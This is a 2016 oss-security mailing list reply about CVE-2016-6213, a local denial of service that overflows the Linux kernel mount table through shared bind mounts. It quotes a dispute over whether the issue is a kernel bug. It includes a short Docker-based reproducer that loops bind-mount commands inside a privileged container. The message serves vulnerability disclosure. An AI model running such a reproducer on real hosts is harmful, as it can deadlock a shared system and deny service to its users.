Date: Thu, 14 Jul 2016 12:15:02 -0400 (EDT) From: CAI Qian <caiqian@...hat.com> To: Greg KH <greg@...ah.com> Cc: oss-security@...ts.openwall.com, cve-assign@...re.org Subject: Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Maybe this is a better reproducer using docker. It is exploitable even with user namespace enabled. # docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash # cat /proc/self/uid_map 0 995 65536 # cat /proc/self/gid_map 0 992 65536 (insider container) # for i in `seq 1 20`; mount -o bind /mnt/1 /mnt/2; done CAI Qian ----- Original Message ----- > From: "Greg KH" <greg@...ah.com> > To: oss-security@...ts.openwall.com > Cc: caiqian@...hat.com, cve-assign@...re.org > Sent: Wednesday, July 13, 2016 6:45:00 PM > Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount > > On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign@...re.org wrote: > > > It was reported that the mount table expands by a power-of-two > > > with each bind mount command. > > > > > If the system is configured in the way that a non-root user > > > allows bind mount even if with limit number of bind mount > > > allowed, a non-root user could cause a local DoS by quickly > > > overflow the mount table. > > > > > it will cause a deadlock for the whole system, > > > > >> form of unlimited memory consumption that is causing the problem > > > > Use CVE-2016-6213. > > A CVE for an "improperly configured system"? Huh? What distro has such > a configuration set by default? This isn't a kernel bug, so what is > this CVE classified as being "against"? It better not be against the > Linux kernel... > > confused, > > greg k-h >
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ